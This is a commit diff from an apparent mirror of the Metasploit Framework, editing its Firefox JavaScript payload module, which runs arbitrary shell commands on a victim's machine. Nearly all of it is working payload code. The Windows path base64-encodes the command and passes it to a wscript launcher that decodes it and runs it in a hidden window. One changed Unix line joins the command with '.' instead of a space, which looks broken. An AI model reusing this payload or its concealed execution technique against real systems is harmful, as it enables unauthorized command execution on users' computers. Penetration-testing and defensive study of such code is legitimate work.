infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixes shell escaping errors with nested quotes in windows.

bug/bundler_fix
Joe Vennix 2014-01-03 16:14:28 -06:00
parent 13464d0aae
commit 8fd517f9ef
1 changed files with 13 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
lib/msf/core/payload/firefox.rb
View File

@ -33,6 +33,7 @@ module Msf::Payload::Firefox
%Q| %Q|
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"] var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent; .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src; var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
var runCmd = function(cmd) { var runCmd = function(cmd) {
var shEsc = "\\\\$&"; var shEsc = "\\\\$&";
@ -71,8 +72,9 @@ module Msf::Payload::Firefox
if (windows) { if (windows) {
var shell = "cmd /c "+cmd; var shell = "cmd /c "+cmd;
shell = "cmd /c "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>"+stderr.path; shell = "cmd /c "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>"+stderr.path;
var b64 = svcs.btoa(shell);
} else { } else {
var shell = ["/bin/sh", "-c", cmd.replace(/\\W/g, shEsc)].join(" "); var shell = ["/bin/sh", "-c", cmd.replace(/\\W/g, shEsc)].join(".");
shell = "/bin/sh -c "+(shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc); shell = "/bin/sh -c "+(shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
} }
var process = Components.classes["@mozilla.org/process/util;1"] var process = Components.classes["@mozilla.org/process/util;1"]
@ -83,7 +85,7 @@ module Msf::Payload::Firefox
if (windows) { if (windows) {
sh.initWithPath("C:\\\\Windows\\\\System32\\\\wscript.exe"); sh.initWithPath("C:\\\\Windows\\\\System32\\\\wscript.exe");
process.init(sh); process.init(sh);
var args = [jscriptFile.path, shell]; var args = [jscriptFile.path, b64];
process.run(true, args, args.length); process.run(true, args, args.length);
} else { } else {
sh.initWithPath("/bin/sh"); sh.initWithPath("/bin/sh");
@ -104,9 +106,15 @@ module Msf::Payload::Firefox
def jscript_launcher def jscript_launcher
%Q| %Q|
var cmdStr = ''; var b64 = WScript.arguments(0);
for (var i = 0; i < WScript.arguments.length; i++) cmdStr += WScript.arguments(i) + " "; var dom = new ActiveXObject("MSXML2.DOMDocument.3.0");
(new ActiveXObject("WScript.Shell")).Run(cmdStr, 0, true); var el = dom.createElement("root");
el.dataType = "bin.base64"; el.text = b64; dom.appendChild(el);
var stream = new ActiveXObject("ADODB.Stream");
stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);
stream.Position=0; stream.type=2; stream.CharSet = "us-ascii"; stream.Position=0;
var cmd = stream.ReadText();
(new ActiveXObject("WScript.Shell")).Run(cmd, 0, true);
| |
end end
end end